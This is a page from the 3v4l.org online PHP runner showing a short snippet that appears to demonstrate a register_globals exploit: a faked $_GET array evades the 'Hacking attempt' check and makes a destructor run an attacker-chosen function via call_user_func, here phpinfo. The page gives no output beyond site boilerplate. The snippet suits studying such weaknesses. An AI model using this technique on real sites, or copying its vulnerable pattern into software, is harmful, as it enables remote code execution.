3v4l.org

run code in 300+ PHP versions simultaneously
<?php $_GET = array('GLOBALS'=>'1', 'shutdown_functions'=>array('function'=>'phpinfo', 'arguments'=>'1')); class Core { function __construct() { $protected = array("_GET", "_POST", "_SERVER", "_COOKIE", "_FILES", "_ENV", "GLOBALS"); foreach($protected as $var) { if(isset($_REQUEST[$var]) || isset($_FILES[$var])) { exit("Hacking attempt"); } } if(@ini_get("register_globals") == 1) { $this->unset_globals($_POST); $this->unset_globals($_GET); $this->unset_globals($_FILES); $this->unset_globals($_COOKIE); } } function unset_globals($array) { if(!is_array($array)) { return; } foreach(array_keys($array) as $key) { unset($GLOBALS[$key]); } } function __destruct() { global $shutdown_functions; if($shutdown_functions && is_array($shutdown_functions)) { call_user_func($shutdown_functions['function'], $shutdown_functions['arguments']); } } } $core = new Core; $shutdown_functions = array(); ?>
Output for git.master, git.master_jit, rfc.property-hooks

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
38.78 ms | 401 KiB | 8 Q